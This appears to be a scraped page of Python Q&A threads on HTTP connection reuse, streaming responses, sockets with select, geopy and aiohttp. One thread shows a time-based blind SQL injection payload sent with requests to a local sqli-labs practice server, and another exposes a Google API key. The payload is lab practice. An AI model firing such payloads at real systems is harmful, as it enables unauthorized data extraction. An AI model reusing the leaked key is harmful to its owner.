Perform handshake only once - python-3.x

I use urllib.request.urlopen to fetch data from server over HTTPS. The function is called a lot to the same server, often to the exact same url. However, unlike standard web browsers which perform a handshake on initial request, calling separate urlopen(url)'s will result in a new handshake for each call. This is very slow on high-latency networks. Is there a way to perform handshake once and reuse the existing connection for further communications?
I cannot modify server code to utilise sockets or other protocols.

You are opening a new connection for every request. To reuse the connection, you either need to use an http.client:
>>> import http.client
>>> conn = http.client.HTTPSConnection("www.python.org")
>>> conn.request("GET", "/")
>>> r1 = conn.getresponse()
>>> print(r1.status, r1.reason)
200 OK
>>> data1 = r1.read() # This will return entire content.
>>> # The following example demonstrates reading data in chunks.
>>> conn.request("GET", "/")
>>> r1 = conn.getresponse()
>>> while not r1.closed:
... print(r1.read(200)) # 200 bytes
b'<!doctype html>\n<!--[if"...
...
>>> # Example of an invalid request
>>> conn.request("GET", "/parrot.spam")
>>> r2 = conn.getresponse()
>>> print(r2.status, r2.reason)
404 Not Found
>>> data2 = r2.read()
>>> conn.close()
Or use the recommended python Requests Package, which has session objects that make use of persistent connections (using urllib3).

You should open a stream for it, because HTTP/(s) is stateless its open new socket to the server for each connection.
So there is no way with this logic, but I just searched around for opening the persistent connection. I just see that hope it will help. It mentions about urllib2
Persistent HTTPS Connections in Python

Related

Python3 http request close connection when nothing is sent

I have an API that have the following workaround:
You make a POST request and it returns "n" lines of data:{json}
It mantain the connection opened until 300 seconds minimum without sending nothing.
As this is very slow, I want to find a way to close the connection when is not sending anything or after a timer.
So, yes, it was easier than what I thought, i'm going to copy paste here my code using http.client library:
def asyncCall(url, data = None, timeout = 300,):
conn = http.client.HTTPConnection(IP, timeout=timeout)
conn.request("POST", url, bytes(json.dumps(data), encoding="utf-8"), )
r1 = conn.getresponse()
while not r1.closed:
l = r1.readline().decode("utf-8")
yield l
On this way, it can pass each line of code to a callback (that run in a separated Process) and close the connection after timeout.

Python Requests.response.elapsed clarification [duplicate]

I am trying to induce an artificial delay in the HTTP response from a web application (This is a technique used to do blind SQL Injections). If the below HTTP request is sent from a browser, response from the web server comes back after 3 seconds(caused by sleep(3)):
http://192.168.2.15/sqli-labs/Less-9/?id=1'+and+if+(ascii(substr(database(),+1,+1))=115,sleep(3),null)+--+
I am trying to do the same in Python 2.7 using the requests library. The code I have is:
import requests
payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = r.elapsed.total_seconds()
print roundtrip
I expected the roundtrip to be 3 seconds, but instead I get values 0.001371, 0.001616, 0.002228, etc. Am I not using the elapsed attribute properly?
elapsed measures the time between sending the request and finishing parsing the response headers, not until the full response has been transferred.
If you want to measure that time, you need to measure it yourself:
import requests
import time
payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
start = time.time()
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = time.time() - start
print roundtrip
I figured out that my payload should have been
payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) -- "}
The last character '+' in the original payload is getting passed to the back end database, which results in an invalid SQL syntax. I shouldn't have done any manual encoding in the payload.

Error Using geopy library

I have the following question, I want to set up a routine to perform iterations inside a dataframe (pandas) to extract longitude and latitude data, after supplying the address using the 'geopy' library.
The routine I created was:
import time
from geopy.geocoders import GoogleV3
import os
arquivo = pd.ExcelFile('path')
df = arquivo.parse("Table1")
def set_proxy():
proxy_addr = 'http://{user}:{passwd}#{address}:{port}'.format(
user='usuario', passwd='senha',
address='IP', port=int('PORTA'))
os.environ['http_proxy'] = proxy_addr
os.environ['https_proxy'] = proxy_addr
def unset_proxy():
os.environ.pop('http_proxy')
os.environ.pop('https_proxy')
set_proxy()
geo_keys = ['AIzaSyBXkATWIrQyNX6T-VRa2gRmC9dJRoqzss0'] # API Google
geolocator = GoogleV3(api_key=geo_keys )
for index, row in df.iterrows():
location = geolocator.geocode(row['NO_LOGRADOURO'])
time.sleep(2)
lat=location.latitude
lon=location.longitude
timeout=10)
address = location.address
unset_proxy()
print(str(lat) + ', ' + str(lon))
The problem I'm having is that when I run the code the following error is thrown:
GeocoderQueryError: Your request was denied.
I tried the creation without passing the key to the google API, however, I get the following message.
KeyError: 'http_proxy'
and if I remove the unset_proxy () statement from within the for, the message I receive is:
GeocoderQuotaExceeded: The given key has gone over the requests limit in the 24 hour period or has submitted too many requests in too short a period of time.
But I only made 5 requests today, and I'm putting a 2-second sleep between requests. Should the period be longer?
Any idea?
api_key argument of the GoogleV3 class must be a string, not a list of strings (that's the cause of your first issue).
geopy doesn't guarantee the http_proxy/https_proxy env vars to be respected (especially the runtime modifications of the os.environ). The advised (by docs) usage of proxies is:
geolocator = GoogleV3(proxies={'http': proxy_addr, 'https': proxy_addr})
PS: Please don't ever post your API keys to the public. I suggest to revoke the key you've posted in the question and generate a new one, to prevent the possibility of it being abused by someone else.

Receiving data only if sent python socket

I am writing a messenger application in python and I have a problem. The problem is quite simple: I want the program to only receive data from the other computer if it was sent, otherwise, my program would wait for a data transfer infinitely. How would I write that piece of code? I imagine it'd be something like this:
try:
data = s.recv(1024).decode()
except:
data == None
See the select module. A socket can be monitored for readability with a timeout, so other process can proceed.
Example server:
import socket
import select
with socket.socket() as server:
server.bind(('',5000))
server.listen(3)
to_read = [server] # add server to list of readable sockets.
clients = {}
while True:
# check for a connection to the server or data ready from clients.
# readers will be empty on timeout.
readers,_,_ = select.select(to_read,[],[],0.5)
for reader in readers:
if reader is server:
client,address = reader.accept()
print('connected',address)
clients[client] = address # store address of client in dict
to_read.append(client) # add client to list of readable sockets
else:
# Simplified, really need a message protocol here.
# For example, could receive a partial UTF-8 encoded sequence.
data = reader.recv(1024)
if not data: # No data indicates disconnect
print('disconnected',clients[reader])
to_read.remove(reader) # remove from monitoring
del clients[reader] # remove from dict as well
else:
print(clients[reader],data.decode())
print('.',flush=True,end='')
A simple client, assuming your IP address is 1.2.3.4.
import socket
s = socket.socket()
s.connect(('1.2.3.4',5000))
s.sendall('hello'.encode())
s.close()

TypeError('not a valid non-string sequence or mapping object',)

I am using aiohttp get request to download some content from another web api
but i am receiving:
exception = TypeError('not a valid non-string sequence or mapping object',)
Following is the data which i am trying to sent.
data = "symbols=LGND-US&exprs=CS_EVENT_TYPE_CD_R(%27%27,%27now%27,%271D%27)"
How to resolve it?
I tried it in 2 ways:
r = yield from aiohttp.get(url, params=data) # and
r = yield from aiohttp.post(url, data=data)
At the same time i am able to fetch data using:
r = requests.get(url, params=data) # and
r = requests.post(url, data=data)
But i need async implementation.
And also suggest me some way if i can use import requests library instead of import aiohttp to make async http request, because in many cases aiohttp post & get request are not working but the same are working for requests.get & post requests.
The docs use bytes (i.e. the 'b' prefix) for the data argument.
r = await aiohttp.post('http://httpbin.org/post', data=b'data')
Also, the params argument should be a dict or a list of tuples.

Resources